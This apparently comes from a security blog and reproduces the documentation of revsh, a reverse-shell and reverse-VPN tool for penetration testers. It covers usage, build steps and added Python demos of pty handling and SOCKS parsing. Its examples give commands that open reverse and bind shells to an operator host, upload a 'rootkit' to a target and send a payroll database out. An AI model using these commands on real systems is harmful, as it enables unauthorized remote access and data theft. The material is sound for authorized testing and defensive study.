Annotated Blog | Security Research | Penetration Testing | APT


emptymonkey/revsh: a reverse shell with terminal support, data tunneling, and advanced pivoting.

Author: prehn   Date: 2020-03-17

revsh is a tool for establishing a reverse shell with terminal support, a reverse VPN for advanced pivoting, and arbitrary data tunnels.


Overview

What is a "reverse shell"?

A reverse shell is a network connection that grants shell access to a remote host. Unlike other remote login tools such as telnet and ssh, it is the remote host that initiates the connection. Because the connection leaves the remote network outbound, this technique bypasses firewalls that are configured to block only inbound connections. (The corresponding defence is egress filtering: a firewall that also restricts outbound connections takes that advantage away.)

What is a "reverse VPN"?

revsh can attach a virtual ethernet card (tun/tap) to either end of its encrypted tunnel. These cards can then be used to forward raw IP packets or ethernet frames. Combined with iptables NAT rules, or bridged to a real ethernet card, this lets the operator obtain a fully routable IP address on the target machine's network. In essence it is a complete VPN that calls back out to the operator, bypassing inbound packet filtering and granting the operator full network access. (See Documentation/REVERSE_VPN.md for details.)

What is a "bind shell"?

A bind shell is a shell served over a normal forward network connection. revsh supports both reverse and bind shells. To invoke a bind shell, either pass the -b flag on both ends of the connection, or invoke the binary under the name "bindsh".

Can't I just use netcat?

There are many techniques for establishing a reverse shell, but those methods don't provide terminal support. revsh gives you a reverse shell whose connection is mediated by a pseudo-terminal, which enables features such as:

In addition, revsh provides the following features:

revsh is a complementary tool for the pentester's toolkit: it provides the full feature set of a terminal across an encrypted tunnel.
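The following is an added example, not revsh's own code, that makes the "terminal support" point concrete. A netcat-style reverse shell wires the shell straight to a socket, so the shell has no terminal: isatty() is false, there is no line discipline, no window size and no job control. A pty-mediated shell runs the shell on the slave side of a pseudo-terminal while the broker copies bytes on the master side and pushes the operator's window size down. The child program is a constructed stand-in for the remote shell; the window size 40x132 is an arbitrary value chosen for the demonstration. Everything runs locally with no network.

```python
"""
Added example, not revsh code: what a shell sees over pipes vs. over a pty.
"""
import fcntl
import os
import pty
import struct
import subprocess
import sys
import termios

# Constructed child program standing in for "the remote shell": it reports
# whether stdin is a terminal and, if so, the terminal size it was given.
CHILD = [
    sys.executable, "-c",
    "import os, sys\n"
    "if sys.stdin.isatty():\n"
    "    s = os.get_terminal_size(0); print('tty', s.lines, s.columns)\n"
    "else:\n"
    "    print('notty')",
]


def run_over_pipes() -> str:
    """The netcat way: stdin/stdout are pipes (a socket behaves the same)."""
    res = subprocess.run(CHILD, stdin=subprocess.DEVNULL,
                         capture_output=True, text=True)
    return res.stdout.strip()


def run_over_pty(rows: int, cols: int) -> str:
    """The pty way: the child gets the slave end of a pseudo-terminal as its
    controlling terminal; the broker sets the window size on it (what a real
    broker does on every SIGWINCH from the operator's terminal) and reads
    the output from the master end."""
    master, slave = pty.openpty()
    # Set the size before the child starts so there is no race with its first read.
    fcntl.ioctl(slave, termios.TIOCSWINSZ, struct.pack("HHHH", rows, cols, 0, 0))

    def make_controlling_tty():
        # Runs in the child after setsid(): adopt the pty as controlling terminal
        # so job control (^C, ^Z, fg/bg) can work. Best effort on odd platforms.
        try:
            fcntl.ioctl(0, termios.TIOCSCTTY, 0)
        except OSError:
            pass

    child = subprocess.Popen(CHILD, stdin=slave, stdout=slave, stderr=slave,
                             start_new_session=True, preexec_fn=make_controlling_tty)
    os.close(slave)                  # only the child holds the slave now
    out = b""
    while True:
        try:
            chunk = os.read(master, 4096)
        except OSError:              # Linux returns EIO once the slave side is gone
            break
        if not chunk:                # other platforms report plain EOF
            break
        out += chunk
    os.close(master)
    child.wait()
    # The tty line discipline turns \n into \r\n on output; normalise it back.
    return out.decode().replace("\r\n", "\n").strip()


if __name__ == "__main__":
    print("over pipes:", run_over_pipes())        # notty
    print("over pty:  ", run_over_pty(40, 132))   # tty 40 132
```

Over pipes the child reports "notty": that is exactly the situation a bare netcat shell is in, which is why ncurses programs refuse to run and why there is no ^C or ^Z. Over the pty it reports "tty 40 132", the size the broker pushed down. A real broker does the TIOCSWINSZ call again every time the operator resizes their terminal, and forwards the raw bytes (including 0x03 for ^C) so the remote line discipline generates the signals.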

Where can I use revsh?

revsh was developed on x86_64 Linux. Below is a short list of Arch/OS combinations it has been used on:

(If you have used revsh successfully on another platform, drop me a line and I'll add it to the list.)

Usage

$ revsh -h

Control:  revsh -c [CONTROL_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]
Target:   revsh [TARGET_OPTIONS] [MUTUAL_OPTIONS] [ADDRESS[:PORT]]

    ADDRESS         The address of the control listener.              (Default is "0.0.0.0".)
    PORT            The port of the control listener.                 (Default is "2200".)

CONTROL_OPTIONS:
    -c              Run in "command and control" mode.                (Default is target mode.)
    -a              Enable Anonymous Diffie-Hellman mode.             (Default is Ephemeral Diffie-Hellman.)
    -d KEYS_DIR     Reference the keys in an alternate directory.     (Default is "~/.revsh/keys/".)
    -f RC_FILE      Reference an alternate rc file.                   (Default is "~/.revsh/rc".)
    -s SHELL        Invoke SHELL as the remote shell.                 (Default is "/bin/bash".)
    -F LOG_FILE     Log general use and errors to LOG_FILE.           (No default set.)

TARGET_OPTIONS:
    -t SEC          Set the connection timeout to SEC seconds.        (Default is "3600".)
    -r SEC1,SEC2    Set the retry time to be SEC1 seconds, or         (Default is "600,1200".)
                    to be random in the range from SEC1 to SEC2.

MUTUAL_OPTIONS:
    -k              Run in keep-alive mode.
                    Node will neither exit normally, nor timeout.
    -L [LHOST:]LPORT:RHOST:RPORT
                    Static socket forwarding with a local listener
                    at LHOST:LPORT forwarding to RHOST:RPORT.
    -R [RHOST:]RPORT:LHOST:LPORT
                    Static socket forwarding with a remote listener
                    at RHOST:RPORT forwarding to LHOST:LPORT.
    -D [LHOST:]LPORT
                    Dynamic socket forwarding with a local listener
                    at LHOST:LPORT. (Socks 4, 4a, and 5. TCP connect only.)
    -B [RHOST:]RPORT
                    Dynamic socket forwarding with a remote listener
                    at RHOST:RPORT. (Socks 4, 4a, and 5. TCP connect only.)
    -x              Disable automatic setup of proxies.               (Defaults: Proxy D2280 and tun/tap devices.)
    -b              Start in bind shell mode.                         (Default is reverse shell mode.)
                    The -b flag must be invoked on both ends.
    -n              Non-interactive netcat style data broker.         (Default is interactive w/remote tty.)
                    No tty. Useful for copying files.
    -v              Verbose. -vv and -vvv increase verbosity.
    -V              Print the program and protocol versions.
    -h              Print this help.
    -e              Print out some usage examples.

Note that "-a" (Anonymous Diffie-Hellman) removes authentication of the peer: anyone who can reach the listener can complete the handshake, so the default Ephemeral Diffie-Hellman mode with keys under ~/.revsh/keys/ is the one to use unless you have a specific reason not to. The default "D2280" proxy set up by the control node is a SOCKS listener on port 2280, which is the hook tools like proxychains or curl's --socks5-hostname use to reach the target's network.
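The -D and -B options expose a SOCKS listener limited to "Socks 4, 4a, and 5. TCP connect only". The block below is an added example, not revsh code, modelling that handshake as pure functions on bytes so the exchange can be exercised offline: the client side builds the request a tool like proxychains or `curl --socks5-hostname` would send, the server side parses it and produces the reply, and anything other than CONNECT (SOCKS5 BIND and UDP ASSOCIATE, SOCKS4 BIND) is refused with the protocol's own error code. The addresses, ports and user id in the usage section are constructed sample values.

```python
"""
Added example, not revsh code: the SOCKS 4/4a/5 CONNECT handshake that a
dynamic forwarder (-D / -B) accepts, built and parsed as plain bytes.
"""
import socket
import struct

CONNECT = 0x01           # same command code in SOCKS4 and SOCKS5
REP_OK, REP_CMD_UNSUPPORTED, REP_ATYP_UNSUPPORTED = 0x00, 0x07, 0x08


class SocksError(Exception):
    """Carries the bytes the server should send back before closing (may be empty)."""
    def __init__(self, reply: bytes, msg: str):
        super().__init__(msg)
        self.reply = reply


# ---- client side -----------------------------------------------------------

def socks5_connect_request(host: str, port: int) -> bytes:
    """VER CMD RSV ATYP DST.ADDR DST.PORT. A name that is not an IP literal is
    sent as ATYP 3 so the far end resolves it (what --socks5-hostname means)."""
    for family, atyp in ((socket.AF_INET, 0x01), (socket.AF_INET6, 0x04)):
        try:
            addr = bytes([atyp]) + socket.inet_pton(family, host)
            break
        except OSError:
            continue
    else:
        name = host.encode("idna")
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05" + bytes([CONNECT, 0x00]) + addr + struct.pack("!H", port)


def socks4a_connect_request(host: str, port: int, userid: bytes = b"") -> bytes:
    """VN CD DSTPORT DSTIP USERID NUL [HOSTNAME NUL]; 4a flags a hostname with DSTIP 0.0.0.1."""
    head = b"\x04" + bytes([CONNECT]) + struct.pack("!H", port)
    try:
        return head + socket.inet_aton(host) + userid + b"\x00"
    except OSError:
        return head + b"\x00\x00\x00\x01" + userid + b"\x00" + host.encode("ascii") + b"\x00"


# ---- server side -----------------------------------------------------------

def socks5_select_method(greeting: bytes) -> bytes:
    """VER NMETHODS METHODS... -> VER METHOD. Only 'no authentication' (0x00) is offered."""
    if len(greeting) < 2 or greeting[0] != 0x05 or len(greeting) != 2 + greeting[1]:
        raise SocksError(b"", "malformed SOCKS5 greeting")
    if 0x00 not in greeting[2:]:
        raise SocksError(b"\x05\xff", "no acceptable authentication method")
    return b"\x05\x00"


def socks5_reply(rep: int) -> bytes:
    """VER REP RSV ATYP BND.ADDR BND.PORT; the bind address is reported as 0.0.0.0:0."""
    return bytes([0x05, rep, 0x00, 0x01]) + b"\x00" * 6


def socks4_reply(granted: bool) -> bytes:
    """VN=0 CD DSTPORT DSTIP; CD 0x5A = request granted, 0x5B = rejected."""
    return b"\x00" + (b"\x5a" if granted else b"\x5b") + b"\x00" * 6


def parse_connect(req: bytes):
    """Dispatch on the version byte; returns (version, host, port, reply_to_send)."""
    if not req:
        raise SocksError(b"", "empty request")
    if req[0] == 0x05:
        return (5,) + _parse_socks5(req) + (socks5_reply(REP_OK),)
    if req[0] == 0x04:
        return (4,) + _parse_socks4(req) + (socks4_reply(True),)
    raise SocksError(b"", f"unknown SOCKS version {req[0]:#x}")


def _parse_socks5(req: bytes):
    if len(req) < 4 or req[2] != 0x00:
        raise SocksError(b"", "malformed SOCKS5 request")
    cmd, atyp, body = req[1], req[3], req[4:]
    if cmd != CONNECT:       # BIND (0x02) / UDP ASSOCIATE (0x03): not a TCP connect
        raise SocksError(socks5_reply(REP_CMD_UNSUPPORTED), f"command {cmd:#x} unsupported")
    if atyp == 0x01 and len(body) == 6:
        host = socket.inet_ntop(socket.AF_INET, body[:4])
    elif atyp == 0x03 and body and len(body) == 3 + body[0]:
        host = body[1:1 + body[0]].decode("idna")
    elif atyp == 0x04 and len(body) == 18:
        host = socket.inet_ntop(socket.AF_INET6, body[:16])
    elif atyp in (0x01, 0x03, 0x04):
        raise SocksError(b"", "truncated SOCKS5 request")
    else:
        raise SocksError(socks5_reply(REP_ATYP_UNSUPPORTED), f"address type {atyp:#x} unsupported")
    return host, struct.unpack("!H", body[-2:])[0]


def _parse_socks4(req: bytes):
    if len(req) < 9:
        raise SocksError(b"", "malformed SOCKS4 request")
    cd, port, ip = req[1], struct.unpack("!H", req[2:4])[0], req[4:8]
    if cd != CONNECT:
        raise SocksError(socks4_reply(False), "SOCKS4 BIND unsupported")
    try:
        userid_end = req.index(b"\x00", 8)
        if ip[:3] == b"\x00\x00\x00" and ip[3] != 0:     # SOCKS4a: hostname follows USERID
            host = req[userid_end + 1:req.index(b"\x00", userid_end + 1)].decode("ascii")
        else:
            host = socket.inet_ntoa(ip)
    except ValueError:
        raise SocksError(socks4_reply(False), "unterminated SOCKS4 string") from None
    return host, port


if __name__ == "__main__":
    # Constructed sample exchange: proxychains-style SOCKS4a and curl-style SOCKS5.
    print(socks5_select_method(b"\x05\x01\x00"))
    print(parse_connect(socks5_connect_request("intranet.corp", 80)))
    print(parse_connect(socks4a_connect_request("192.168.0.66", 22, b"proxychains")))
```

Two points worth noticing when pointing a client at the forwarder: send hostnames as ATYP 3 (SOCKS5) or with the 0.0.0.x marker (SOCKS4a) so DNS is resolved on the target side of the tunnel rather than leaking lookups from the operator's machine, and expect a 0x07 "command not supported" reply for anything but CONNECT, since UDP is not carried.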

Installation

First, you'll need to build OpenSSL from source. (See the note below.)

git clone https://github.com/openssl/openssl.git
cd openssl/
./config no-shared -static    # These options are needed to build static applications against OpenSSL.
make && make test             # We skip "make install" so we don't conflict with your system's default OpenSSL.
                              # We will build revsh against the OpenSSL we just compiled in this tree.
cd ..

Now build revsh.

git clone https://github.com/emptymonkey/revsh.git
cd revsh
vi config.h       # Set up new defaults that fit your situation.
vi Makefile       # Check that the selected build environment is the one you want. (It probably already is by default.)
make              # This *can* take a very long time, though it usually doesn't.
make install
vi ~/.revsh/rc    # Add your favorite startup commands to really customize the feel of your remote shell.
revsh -h

Note: As of OpenSSL 1.1.0, OpenSSL must be built from source for use in a statically linked binary. Building a statically linked binary against the OpenSSL libraries that ship with most Linux distributions (including Kali) won't work. (If it builds at all, it will segfault.) A static binary is what you want for the target side, since it has to run on a machine whose installed libraries you don't control.

Examples

Control host example IP: 192.168.0.42
Target host example IP:  192.168.0.66

Interactive example on default port '2200':
  control:  revsh -c
  target:   revsh 192.168.0.42

Interactive example on non-standard port '443':
  control:  revsh -c 192.168.0.42:443
  target:   revsh 192.168.0.42:443

Bindshell example:
  target:   revsh -b
  control:  revsh -c -b 192.168.0.66

Non-interactive file upload example:
  control:  cat ~/bin/rootkit | revsh -c -n
  target:   revsh 192.168.0.42 > ./totally_not_a_rootkit

Non-interactive file download example:
  control:  revsh -c -n >payroll_db.tar
  target:   cat payroll_db.tar | revsh 192.168.0.42

Non-interactive file download example across an existing tunnel:
  control:  revsh -c -n 127.0.0.1:2291 >payroll_db.tar
  target:   cat payroll_db.tar | revsh 127.0.0.1:2290

In the last example the second session rides inside the first: a port forward in the already-established tunnel carries the target's 127.0.0.1:2290 to the control host's 127.0.0.1:2291. In terms of the usage above that is the -R form, e.g. -R 2290:127.0.0.1:2291 given on the control side, so the second connection never touches the network between the two hosts directly.